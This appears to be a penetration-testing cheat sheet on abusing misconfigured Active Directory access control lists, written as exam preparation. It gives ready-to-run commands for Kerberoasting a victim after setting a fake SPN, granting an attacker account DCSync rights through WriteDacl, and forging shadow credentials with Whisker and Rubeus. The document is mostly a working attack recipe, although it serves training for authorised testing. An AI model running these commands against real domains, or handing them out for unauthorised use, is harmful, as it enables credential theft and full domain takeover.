ACL Abuse
Active Directory
Overview
Exploiting misconfigured Active Directory Access Control Lists.
Cheatsheet
BloodHound ACL Edges
- GenericAll: Full control
- GenericWrite: Modify attributes
- WriteOwner: Change owner
- WriteDacl: Modify permissions
- ForceChangePassword: Reset password
Abuse GenericAll on User
# Set SPN for Kerberoasting
Set-DomainObject -Identity victim -Set @{serviceprincipalname='fake/YOURPC'} # Abuse GenericAll to set SPN
GetUserSPNs.py domain/attacker -dc-ip DC # Kerberoast the modified account
Abuse WriteDacl
# Grant yourself DCSync rights
Add-DomainObjectAcl -TargetIdentity 'DC=domain,DC=local' -PrincipalIdentity attacker -Rights DCSync # Abuse WriteDacl to grant DCSync
Shadow Credentials
Whisker.exe add /target:victim # Add shadow credential
Rubeus.exe asktgt /user:victim /certificate:cert.pfx /password:pass # Auth with shadow cert
Command Examples
Common Pitfalls
- Not running BloodHound collection
- Missing indirect attack paths
- Forgetting to clean up changes
Exam Survival Tips
- BloodHound is essential for ACL discovery
- Check 'Shortest Path to Domain Admin'
- Look for GenericAll on groups